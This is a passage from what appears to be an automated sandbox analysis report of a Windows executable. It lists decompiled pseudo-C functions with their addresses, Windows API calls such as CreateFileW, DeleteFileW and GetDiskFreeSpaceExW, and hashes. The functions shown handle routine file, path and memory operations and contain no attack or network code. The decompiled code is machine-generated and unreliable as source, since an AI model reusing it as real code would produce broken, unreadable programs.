					} else {
						_t39 =  *(_t56 - 0x70);
						 *_t39 =  *(_t56 - 0x6c);
						_t39->LowPart.HighPart =  *(_t56 - 0x68);
						_t27 = 1;
					}
				}
				_pop(_t55);
				_pop(_t43);
				return E00D0071A(_t27, _t43,  *(_t56 + 0x1a8) ^ _t56, _t48, _t49, _t55);
			}















                                                                                                                                                                                          0x00ce7974
                                                                                                                                                                                          0x00ce7975
                                                                                                                                                                                          0x00ce7982
                                                                                                                                                                                          0x00ce7989
                                                                                                                                                                                          0x00ce7997
                                                                                                                                                                                          0x00ce799d
                                                                                                                                                                                          0x00ce79a2
                                                                                                                                                                                          0x00ce79a6
                                                                                                                                                                                          0x00ce79ae
                                                                                                                                                                                          0x00ce79b7
                                                                                                                                                                                          0x00ce79c4
                                                                                                                                                                                          0x00ce79cb
                                                                                                                                                                                          0x00ce79d1
                                                                                                                                                                                          0x00ce79d2
                                                                                                                                                                                          0x00ce79d8
                                                                                                                                                                                          0x00ce79dc
                                                                                                                                                                                          0x00ce79e2
                                                                                                                                                                                          0x00ce79f3
                                                                                                                                                                                          0x00ce79f9
                                                                                                                                                                                          0x00ce79fc
                                                                                                                                                                                          0x00ce7a11
                                                                                                                                                                                          0x00ce79fe
                                                                                                                                                                                          0x00ce79fe
                                                                                                                                                                                          0x00ce7a04
                                                                                                                                                                                          0x00ce7a09
                                                                                                                                                                                          0x00ce7a0e
                                                                                                                                                                                          0x00ce7a0e
                                                                                                                                                                                          0x00ce79fc
                                                                                                                                                                                          0x00ce7a19
                                                                                                                                                                                          0x00ce7a1c
                                                                                                                                                                                          0x00ce7a29

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • _memset.LIBCMT ref: 00CE79B7
                                                                                                                                                                                          • __wsplitpath.LIBCMT ref: 00CE79C4
                                                                                                                                                                                            • Part of subcall function 00D0A9EB: __wsplitpath_helper.LIBCMT ref: 00D0AA2D
                                                                                                                                                                                          • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,?,761B5A40), ref: 00CE79F3
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.537362630.0000000000C81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.537326906.0000000000C80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537675953.0000000000D3A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537750623.0000000000D5D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537775522.0000000000D5E000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537801127.0000000000D60000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537839655.0000000000D65000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537865172.0000000000D66000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537894031.0000000000D6B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.538818588.0000000000FA8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_c80000_UNK_.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: DiskFreeSpace__wsplitpath__wsplitpath_helper_memset
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1401654830-0
                                                                                                                                                                                          • Opcode ID: d38de8db6c0ed033eb1d6c31ba45bb6c966470b4f55fe4261ad8356abf9bd248
                                                                                                                                                                                          • Instruction ID: 916968e504c7cdec505dc20b2f4fa2e687312a0c9e5747c1fb319b02683562a3
                                                                                                                                                                                          • Opcode Fuzzy Hash: d38de8db6c0ed033eb1d6c31ba45bb6c966470b4f55fe4261ad8356abf9bd248
                                                                                                                                                                                          • Instruction Fuzzy Hash: FB21CF7290430CAFDB21DFE8DC859DEB7BDEB49300F10492AE519E7241E730AA058B61
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00C9D274 Relevance: 4.5, APIs: 3, Instructions: 43COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 84%
                                                                                                                                                                                          			E00C9D274(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t30;
				intOrPtr* _t39;
				void* _t40;

				E00D015C3(0xd303f8, __ebx, __edi, __esi);
				 *(_t40 - 0x21c) =  *(_t40 - 0x21c) & 0x00000000;
				_t39 =  *((intOrPtr*)(_t40 + 8));
				_t30 =  *0xd5d01c; // 0xd5d014
				 *((intOrPtr*)(_t40 - 0x220)) = _t39;
				 *_t39 = _t30;
				 *(_t40 - 4) =  *(_t40 - 4) & 0x00000000;
				 *(_t40 - 0x21c) = 1;
				E00C9CCC5(_t39, _t40, __ecx + 0x10);
				E00C9CA59(_t39, 0xd48b4c);
				E00C9CA59(_t39,  *((intOrPtr*)(_t40 + 0xc)));
				 *((short*)(_t40 - 0x218)) = 0;
				E00D006A0( *((intOrPtr*)(_t40 + 0xc)), _t40 - 0x216, 0, 0x206);
				__imp__GetLongPathNameW( *_t39, _t40 - 0x218, 0x104, 0x214); // executed
				E00C9ACCC(_t39, _t40 - 0x218);
				return E00D01646(__ebx,  *((intOrPtr*)(_t40 + 0xc)), _t39);
			}






                                                                                                                                                                                          0x00c9d27e
                                                                                                                                                                                          0x00c9d285
                                                                                                                                                                                          0x00c9d28c
                                                                                                                                                                                          0x00c9d28f
                                                                                                                                                                                          0x00c9d298
                                                                                                                                                                                          0x00c9d29e
                                                                                                                                                                                          0x00c9d2a0
                                                                                                                                                                                          0x00c9d2aa
                                                                                                                                                                                          0x00c9d2b4
                                                                                                                                                                                          0x00c9d2c0
                                                                                                                                                                                          0x00c9d2c8
                                                                                                                                                                                          0x00c9d2d5
                                                                                                                                                                                          0x00c9d2e3
                                                                                                                                                                                          0x00c9d2fa
                                                                                                                                                                                          0x00c9d309
                                                                                                                                                                                          0x00c9d315

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 00C9D27E
                                                                                                                                                                                            • Part of subcall function 00C9CA59: lstrlenW.KERNEL32(00CC6DE8,00000000,?,00CC6DE8,&ver=,00000000,?,?,?,?,?,00000000,000000C8,?,?,0000000C), ref: 00C9CA6A
                                                                                                                                                                                          • _memset.LIBCMT ref: 00C9D2E3
                                                                                                                                                                                          • GetLongPathNameW.KERNEL32(00000000,?,00000104), ref: 00C9D2FA
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.537362630.0000000000C81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.537326906.0000000000C80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537675953.0000000000D3A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537750623.0000000000D5D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537775522.0000000000D5E000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537801127.0000000000D60000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537839655.0000000000D65000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537865172.0000000000D66000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537894031.0000000000D6B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.538818588.0000000000FA8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_c80000_UNK_.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: H_prolog3_LongNamePath_memsetlstrlen
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2325145193-0
                                                                                                                                                                                          • Opcode ID: 816cda7a2a1ec5c832ffdf15e451d47a06a910dc291f203ad13cfa1b75128816
                                                                                                                                                                                          • Instruction ID: 6979200c1b21a1c8bf6e4dad58b6988b99c8401bdd63e061125f906af7e64268
                                                                                                                                                                                          • Opcode Fuzzy Hash: 816cda7a2a1ec5c832ffdf15e451d47a06a910dc291f203ad13cfa1b75128816
                                                                                                                                                                                          • Instruction Fuzzy Hash: 09015E75A80218ABDB54EB68CC8EBDDB2B8EB54700F004489B449EB381DA749A459FE5
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00C82770 Relevance: 4.5, APIs: 3, Instructions: 42fileCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 34%
                                                                                                                                                                                          			E00C82770(WCHAR* __eax, long* __edi, intOrPtr _a4) {
				void* _t3;
				void* _t4;
				void* _t16;

				_t3 = CreateFileW(__eax, 0x80000000, 1, 0, 3, 0x80, 0); // executed
				_t16 = _t3;
				if(_t16 != 0xffffffff) {
					_t4 = E00C82860(_t16, __edi, __eflags, _a4, 0); // executed
					_push(_t16);
					__eflags = _t4;
					if(_t4 != 0) {
						CloseHandle();
						return 1;
					} else {
						CloseHandle();
						__eflags = 0;
						return 0;
					}
				} else {
					if(__edi != 0) {
						 *__edi = 1;
					}
					_push(0xd47270);
					_push(0);
					_push(0);
					E00C88150(0xd47270);
					return 0;
				}
			}






                                                                                                                                                                                          0x00c82784
                                                                                                                                                                                          0x00c8278a
                                                                                                                                                                                          0x00c8278f
                                                                                                                                                                                          0x00c827c0
                                                                                                                                                                                          0x00c827c8
                                                                                                                                                                                          0x00c827c9
                                                                                                                                                                                          0x00c827cb
                                                                                                                                                                                          0x00c827d7
                                                                                                                                                                                          0x00c827e3
                                                                                                                                                                                          0x00c827cd
                                                                                                                                                                                          0x00c827cd
                                                                                                                                                                                          0x00c827d3
                                                                                                                                                                                          0x00c827d6
                                                                                                                                                                                          0x00c827d6
                                                                                                                                                                                          0x00c82791
                                                                                                                                                                                          0x00c82793
                                                                                                                                                                                          0x00c82795
                                                                                                                                                                                          0x00c82795
                                                                                                                                                                                          0x00c8279b
                                                                                                                                                                                          0x00c827a0
                                                                                                                                                                                          0x00c827a2
                                                                                                                                                                                          0x00c827a9
                                                                                                                                                                                          0x00c827b4
                                                                                                                                                                                          0x00c827b4

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,?,00C82744,?), ref: 00C82784
                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 00C827CD
                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 00C827D7
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.537362630.0000000000C81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.537326906.0000000000C80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537675953.0000000000D3A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537750623.0000000000D5D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537775522.0000000000D5E000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537801127.0000000000D60000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537839655.0000000000D65000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537865172.0000000000D66000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537894031.0000000000D6B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.538818588.0000000000FA8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_c80000_UNK_.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CloseHandle$CreateFile
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1378612225-0
                                                                                                                                                                                          • Opcode ID: 378d1d0d84cc50e41a8cbba3ae74a348e45cb168210a54795d973ce9fea9f67a
                                                                                                                                                                                          • Instruction ID: 022c2ed5a096320bd7b743b0e96ee009d2590539905008a8d32b672fc4b95e31
                                                                                                                                                                                          • Opcode Fuzzy Hash: 378d1d0d84cc50e41a8cbba3ae74a348e45cb168210a54795d973ce9fea9f67a
                                                                                                                                                                                          • Instruction Fuzzy Hash: 61F0273178431077EB3033BDBC4EF9A26868B94B24F250514FA51FA3C4EAF86D8542AD
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00CEEF14 Relevance: 4.5, APIs: 3, Instructions: 36fileCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 64%
                                                                                                                                                                                          			E00CEEF14(void* __ecx, WCHAR* _a4) {
				void* _t9;
				void* _t17;
				void* _t18;

				_t18 = __ecx; // executed
				DeleteFileW(_a4); // executed
				_t9 = CreateFileW(_a4, 0xc0000000, 1, 0, 1, 0x80, 0); // executed
				_t17 = _t9;
				if(_t17 != 0xffffffff) {
					_a4 = _a4 & 0x00000000;
					_push( &_a4);
					_push( *((intOrPtr*)(_t18 + 8)));
					_push( *((intOrPtr*)(_t18 + 4)));
					_push(_t17);
					E00CEEBFC();
					FindCloseChangeNotification(_t17); // executed
					return 1;
				}
				return 0;
			}






                                                                                                                                                                                          0x00ceef1c
                                                                                                                                                                                          0x00ceef1e
                                                                                                                                                                                          0x00ceef39
                                                                                                                                                                                          0x00ceef3f
                                                                                                                                                                                          0x00ceef44
                                                                                                                                                                                          0x00ceef4a
                                                                                                                                                                                          0x00ceef51
                                                                                                                                                                                          0x00ceef52
                                                                                                                                                                                          0x00ceef55
                                                                                                                                                                                          0x00ceef58
                                                                                                                                                                                          0x00ceef59
                                                                                                                                                                                          0x00ceef62
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00ceef6a
                                                                                                                                                                                          0x00000000

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • DeleteFileW.KERNEL32(00CEF167,?,7620F7F0,?,00CEF167,?), ref: 00CEEF1E
                                                                                                                                                                                          • CreateFileW.KERNEL32(00CEF167,C0000000,00000001,00000000,00000001,00000080,00000000,?,00CEF167,?), ref: 00CEEF39
                                                                                                                                                                                          • FindCloseChangeNotification.KERNEL32(00000000), ref: 00CEEF62
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.537362630.0000000000C81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.537326906.0000000000C80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537675953.0000000000D3A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537750623.0000000000D5D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537775522.0000000000D5E000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537801127.0000000000D60000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537839655.0000000000D65000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537865172.0000000000D66000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537894031.0000000000D6B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.538818588.0000000000FA8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_c80000_UNK_.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: File$ChangeCloseCreateDeleteFindNotification
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1359368785-0
                                                                                                                                                                                          • Opcode ID: cff980d57d1e90722291f318d34cc89b92fd641b6e650784e31cc7b65ec66ed5
                                                                                                                                                                                          • Instruction ID: d5b05d923fb83e85301d39eda417363d9b8ca6ef73397bb35bd3451f1a8562ec
                                                                                                                                                                                          • Opcode Fuzzy Hash: cff980d57d1e90722291f318d34cc89b92fd641b6e650784e31cc7b65ec66ed5
                                                                                                                                                                                          • Instruction Fuzzy Hash: 29F02732250304BBDB202BA6DC09FEA3FA9DB457A1F008424FB55D61D0D772A450D7A5
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00D0167F Relevance: 4.5, APIs: 3, Instructions: 34COMMONLIBRARYCODE
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 75%
                                                                                                                                                                                          			E00D0167F(void* __ebx, void* __edx, void* __edi, void* __eflags, intOrPtr _a4) {
				signed int _v8;
				char _v16;
				signed int _v32;
				void* _t15;
				signed int _t16;
				void* _t28;
				void* _t36;
				void* _t37;
				intOrPtr _t39;

				_t37 = __edi;
				_t36 = __edx;
				_t28 = __ebx;
				while(1) {
					_t15 = E00D017AD(_t28, _t36, _t37, _a4); // executed
					if(_t15 != 0) {
						break;
					}
					_t16 = E00D11307(_a4);
					__eflags = _t16;
					if(_t16 == 0) {
						__eflags =  *0xd6809c & 0x00000001;
						if(( *0xd6809c & 0x00000001) == 0) {
							 *0xd6809c =  *0xd6809c | 0x00000001;
							__eflags =  *0xd6809c;
							E00D01664(0xd68090);
							E00D010C4( *0xd6809c, 0xd3986c);
						}
						E00C8D2D0( &_v16, 0xd68090);
						E00D00729( &_v16, 0xd59840);
						asm("int3");
						_push(0xc);
						_push(0xd58a78);
						E00D009BC(_t28, _t37, 0xd68090);
						_v32 = _v32 & 0x00000000;
						_t39 = _a4;
						__eflags = _t39 -  *0xd6a1b0;
						if(_t39 <=  *0xd6a1b0) {
							E00D0EFCA(_t28, _t37, 4);
							_t10 =  &_v8;
							 *_t10 = _v8 & 0x00000000;
							__eflags =  *_t10;
							_push(_t39);
							_v32 = E00D0FD38();
							_v8 = 0xfffffffe;
							E00D0172A();
						}
						return E00D00A01(_v32);
					} else {
						continue;
					}
					L10:
				}
				return _t15;
				goto L10;
			}












                                                                                                                                                                                          0x00d0167f
                                                                                                                                                                                          0x00d0167f
                                                                                                                                                                                          0x00d0167f
                                                                                                                                                                                          0x00d01696
                                                                                                                                                                                          0x00d01699
                                                                                                                                                                                          0x00d016a1
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00d0168c
                                                                                                                                                                                          0x00d01692
                                                                                                                                                                                          0x00d01694
                                                                                                                                                                                          0x00d016a5
                                                                                                                                                                                          0x00d016b1
                                                                                                                                                                                          0x00d016b3
                                                                                                                                                                                          0x00d016b3
                                                                                                                                                                                          0x00d016bc
                                                                                                                                                                                          0x00d016c6
                                                                                                                                                                                          0x00d016cb
                                                                                                                                                                                          0x00d016d0
                                                                                                                                                                                          0x00d016de
                                                                                                                                                                                          0x00d016e3
                                                                                                                                                                                          0x00d016e4
                                                                                                                                                                                          0x00d016e6
                                                                                                                                                                                          0x00d016eb
                                                                                                                                                                                          0x00d016f0
                                                                                                                                                                                          0x00d016f4
                                                                                                                                                                                          0x00d016f7
                                                                                                                                                                                          0x00d016fd
                                                                                                                                                                                          0x00d01701
                                                                                                                                                                                          0x00d01707
                                                                                                                                                                                          0x00d01707
                                                                                                                                                                                          0x00d01707
                                                                                                                                                                                          0x00d0170b
                                                                                                                                                                                          0x00d01712
                                                                                                                                                                                          0x00d01715
                                                                                                                                                                                          0x00d0171c
                                                                                                                                                                                          0x00d0171c
                                                                                                                                                                                          0x00d01729
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00d01694
                                                                                                                                                                                          0x00d016a4
                                                                                                                                                                                          0x00000000

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • _malloc.LIBCMT ref: 00D01699
                                                                                                                                                                                            • Part of subcall function 00D017AD: __FF_MSGBANNER.LIBCMT ref: 00D017D0
                                                                                                                                                                                            • Part of subcall function 00D017AD: __NMSG_WRITE.LIBCMT ref: 00D017D7
                                                                                                                                                                                            • Part of subcall function 00D017AD: RtlAllocateHeap.NTDLL(00000000,?,00000001,00000000,00000000,?,00D0C457,?,00000001,?,?,00D0EF54,00000018,00D590E8,0000000C,00D0EFE5), ref: 00D01824
                                                                                                                                                                                          • std::bad_alloc::bad_alloc.LIBCMT ref: 00D016BC
                                                                                                                                                                                            • Part of subcall function 00D01664: std::exception::exception.LIBCMT ref: 00D01670
                                                                                                                                                                                          • __CxxThrowException@8.LIBCMT ref: 00D016DE
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.537362630.0000000000C81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.537326906.0000000000C80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537675953.0000000000D3A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537750623.0000000000D5D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537775522.0000000000D5E000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537801127.0000000000D60000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537839655.0000000000D65000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537865172.0000000000D66000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537894031.0000000000D6B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.538818588.0000000000FA8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_c80000_UNK_.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AllocateException@8HeapThrow_mallocstd::bad_alloc::bad_allocstd::exception::exception
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3715980512-0
                                                                                                                                                                                          • Opcode ID: a673d2c8dda5b70befaa422093d685012c6252b0e415cd516bed910111ef0802
                                                                                                                                                                                          • Instruction ID: c8961ffb0d265d6ef48292e836d837f1f9da7532f5118fcf4baf8610982af36e
                                                                                                                                                                                          • Opcode Fuzzy Hash: a673d2c8dda5b70befaa422093d685012c6252b0e415cd516bed910111ef0802
                                                                                                                                                                                          • Instruction Fuzzy Hash: E8F0E2388002096ACF047B61DC06B993B988B81368F880024EE0D950D1DFA1D94C9A70
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00C9C15B Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 39COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 95%
                                                                                                                                                                                          			E00C9C15B(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t15;
				void* _t18;
				void* _t25;
				void* _t34;
				void* _t35;
				void* _t36;

				_t36 = __eflags;
				_push(0xc);
				E00D0155A(0xd3023e, __ebx, __edi, __esi);
				E00CEEBD0(_t35 - 0x18);
				 *(_t35 - 4) =  *(_t35 - 4) & 0x00000000;
				_t15 = E00CEEEDC(_t35 - 0x18, _t36, 0, 0x144, "CAB"); // executed
				_t25 = _t35 - 0x18;
				if(_t15 != 0) {
					_t32 = __ecx + 0x10;
					__eflags = E00CEF3A8(__ebx, _t25, __edx, __edi, __ecx + 0x10, __eflags, __ecx + 0x10);
					if(__eflags != 0) {
						L7:
						_t34 = 1;
					} else {
						_t16 = E00CEF4D0(_t35 - 0x18, __edx, __eflags, _t32);
						__eflags = _t16;
						if(_t16 != 0) {
							goto L7;
						} else {
							_t34 = 0;
							__eflags = 0;
						}
					}
					 *(_t35 - 4) =  *(_t35 - 4) | 0xffffffff;
					E00CEEBE1(_t16, _t35 - 0x18);
					_t18 = _t34;
				} else {
					 *(_t35 - 4) =  *(_t35 - 4) | 0xffffffff;
					E00CEEBE1(_t15, _t25);
					_t18 = 0;
				}
				return E00D01632(_t18);
			}









                                                                                                                                                                                          0x00c9c15b
                                                                                                                                                                                          0x00c9c15b
                                                                                                                                                                                          0x00c9c162
                                                                                                                                                                                          0x00c9c16c
                                                                                                                                                                                          0x00c9c171
                                                                                                                                                                                          0x00c9c184
                                                                                                                                                                                          0x00c9c189
                                                                                                                                                                                          0x00c9c18e
                                                                                                                                                                                          0x00c9c1a1
                                                                                                                                                                                          0x00c9c1aa
                                                                                                                                                                                          0x00c9c1ac
                                                                                                                                                                                          0x00c9c1cd
                                                                                                                                                                                          0x00c9c1cf
                                                                                                                                                                                          0x00c9c1ae
                                                                                                                                                                                          0x00c9c1b2
                                                                                                                                                                                          0x00c9c1b7
                                                                                                                                                                                          0x00c9c1b9
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c9c1bb
                                                                                                                                                                                          0x00c9c1bb
                                                                                                                                                                                          0x00c9c1bb
                                                                                                                                                                                          0x00c9c1bb
                                                                                                                                                                                          0x00c9c1b9
                                                                                                                                                                                          0x00c9c1bd
                                                                                                                                                                                          0x00c9c1c4
                                                                                                                                                                                          0x00c9c1c9
                                                                                                                                                                                          0x00c9c190
                                                                                                                                                                                          0x00c9c190
                                                                                                                                                                                          0x00c9c194
                                                                                                                                                                                          0x00c9c199
                                                                                                                                                                                          0x00c9c199
                                                                                                                                                                                          0x00c9c1a0

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.537362630.0000000000C81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.537326906.0000000000C80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537675953.0000000000D3A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537750623.0000000000D5D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537775522.0000000000D5E000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537801127.0000000000D60000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537839655.0000000000D65000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537865172.0000000000D66000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537894031.0000000000D6B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.538818588.0000000000FA8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_c80000_UNK_.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: H_prolog3
                                                                                                                                                                                          • String ID: CAB
                                                                                                                                                                                          • API String ID: 431132790-4230853747
                                                                                                                                                                                          • Opcode ID: 08bd1c0682d628b8b7e27e3dec1becd96dbd63f74620fa969871f0a47618a1d7
                                                                                                                                                                                          • Instruction ID: f453709076b6ec7069256a89aa751e6030f987505b433477a72332910c1a7d48
                                                                                                                                                                                          • Opcode Fuzzy Hash: 08bd1c0682d628b8b7e27e3dec1becd96dbd63f74620fa969871f0a47618a1d7
                                                                                                                                                                                          • Instruction Fuzzy Hash: 60F0C835A4021597EF14F6728C57BAEB7209F10360F100228F922B70D2EB604B46D698
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00C8E730 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 28libraryCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 29%
